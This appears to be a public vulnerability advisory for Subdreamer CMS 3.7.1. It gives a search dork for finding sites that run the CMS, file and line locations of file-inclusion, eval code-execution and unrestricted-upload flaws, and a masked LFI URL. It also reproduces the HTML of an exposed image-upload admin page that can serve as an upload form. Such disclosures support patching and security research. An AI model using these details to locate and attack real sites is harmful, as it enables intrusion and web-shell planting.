0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1===================
| # Title : Subdreamer CMS-v3.7.1 Mullti Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media
| # Tested on: win8.1 Fr V.(Pro) 23:09 * 22/05/2015
| # Download : http://www.20script.ir
===========================================================================================
Directory listing :
http://127.0.0.1/Subdreamer/admin/tiny_mce/
http://127.0.0.1/Subdreamer/admin/login/
Remote/Local File Inclusion :
C:\web\www\Subdreamer\index.php
Line :1097
Function :include
Variables :$headerfile
Php Code Execution :
C:\web\www\Subdreamer\index.php
Line : 1616
Function : eval
Variables : $layout_arr,$layout_index
LFI :
http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=****
Upload File :
C:\web\www\Subdreamer\admin\tiny_mce\plugins\imagemanager\imagemanager.php
Line : 262
Function : move_uploaded_file
Variables : $image['tmp_name'],$imagesdir,$imagesdir
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<title>Subdreamer CMS - Admin Panel</title>
<link rel="stylesheet" type="text/css" href="http://127.0.0.1/Subdreamer/admin/styles/flipside/css/admin.css.php" />
<style type="text/css">
#content { padding: 0; margin: 0; max-width: 850px !important; min-width: 200px !important; }
.fileentry-container,
.fileentry-container-media {
background-color: #FFF;
border: 1px solid #c0c0c0;
display: inline;
float: left;
margin: 10px;
height: 130px;
text-align: center;
width: 130px;
overflow: hidden;
}
.fileentry, .fileentry-media {
border: none;
display: block;
border: none;
padding: 4px;
min-height: 120px;
text-align: center;
}
.fileentry-container:hover {
border: 1px solid #0000FF;
}
.fileentry-container-media:hover {
border: 1px solid #00FF00;
}
</style>
<script type="text/javascript" src="../../tiny_mce_popup.js"></script>
<script type="text/javascript">
sdurl = "http://127.0.0.1/Subdreamer/";
function InsertImage(imagepath,img_width,img_height) {
tinyMCE.execCommand("mceInsertContent", false, '<img src="'+imagepath+'" width="'+img_width+'" height="'+img_height+'" style="border: none" />');
tinyMCEPopup.close();
}
</script>
</head>
<body>
<div id="content">
<!-- start section --><h1>Upload File</h1>
<div class="table_wrap">
<div class="form_wrap">
<table border="0" cellpadding="0" cellspacing="0" summary="layout" width="100%">
<tr>
<td class="td2"><strong>Upload a new image to this folder:</strong></td>
<td align="left" class="td3">
<form enctype="multipart/form-data" method="post" action="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php" id="upload_form">
<input type="hidden" name="action" value="uploadimage" />
<input type="hidden" name="folderpath" value="****images/" />
<input name="image" type="file" size="70" /><br />
<input type="submit" value="Upload File" />
</form>
<a href="#" onclick='javascript:window.location="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=%2A%2A%2A%2Aimages%2F&action=displayimages"'>[Site Images]</a>
<a href="#" onclick='javascript:window.location="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=%2A%2A%2A%2Aimages%2Farticlethumbs%2F&action=displayimages"'>[Articles Thumbs]</a>
<a href="#" onclick='javascript:window.location="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=%2A%2A%2A%2Aimages%2Ffeaturedpics%2F&action=displayimages"'>[Articles Pictures]</a>
</td>
</tr>
</table>
</div> <!-- form_wrap -->
</div> <!-- table_wrap -->
<!-- start section --><h1>Images</h1>
<div class="table_wrap">
<div class="form_wrap">
<table border="0" cellpadding="0" cellspacing="0" summary="images" width="100%">
<tr>
<td class="td1">Folder Path: http://127.0.0.1/Subdreamer/images/</td>
</tr>
<tr>
<td class="td2" align="left" style="text-align: left">
<div class="fileentry-container"><div class="fileentry"><a href="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=****images/articlethumbs/"><img alt="Change folder" border="0" width="48" height="48" src="./img/folder.gif" /></a> <br /><a style="font-size: 10px;" href="./imagemanager.php?folderpath=****images/articlethumbs/">articlethumbs</a></div></div>
<div class="fileentry-container"><div class="fileentry"><a href="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=****images/featuredpics/"><img alt="Change folder" border="0" width="48" height="48" src="./img/folder.gif" /></a> <br /><a style="font-size: 10px;" href="./imagemanager.php?folderpath=****images/featuredpics/">featuredpics</a></div></div>
<div class="fileentry-container"><div class="fileentry"><a href="javascript:void(0);" onmousedown='InsertImage("http://127.0.0.1/Subdreamer/images/default_avatar.png",80,80);' title="default_avatar.png"><img alt="default_avatar.png" border="0" src="../../../../images/default_avatar.png" width="80" height="80" /></a></div></div>
<div class="fileentry-container"><div class="fileentry"><a href="javascript:void(0);" onmousedown='InsertImage("http://127.0.0.1/Subdreamer/images/edit.png",16,16);' title="edit.png"><img alt="edit.png" border="0" src="../../../../images/edit.png" width="16" height="16" /></a></div></div>
<div class="fileentry-container"><div class="fileentry"><a href="javascript:void(0);" onmousedown='InsertImage("http://127.0.0.1/Subdreamer/images/mail.png",16,16);' title="mail.png"><img alt="mail.png" border="0" src="../../../../images/mail.png" width="16" height="16" /></a></div></div>
<div class="fileentry-container"><div class="fileentry"><a href="javascript:void(0);" onmousedown='InsertImage("http://127.0.0.1/Subdreamer/images/ratings.gif",85,48);' title="ratings.gif"><img alt="ratings.gif" border="0" src="../../../../images/ratings.gif" width="85" height="48" /></a></div></div>
</td>
</tr>
</table>
</div> <!-- form_wrap -->
</div> <!-- table_wrap -->
</div>
</body>
</html>
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================
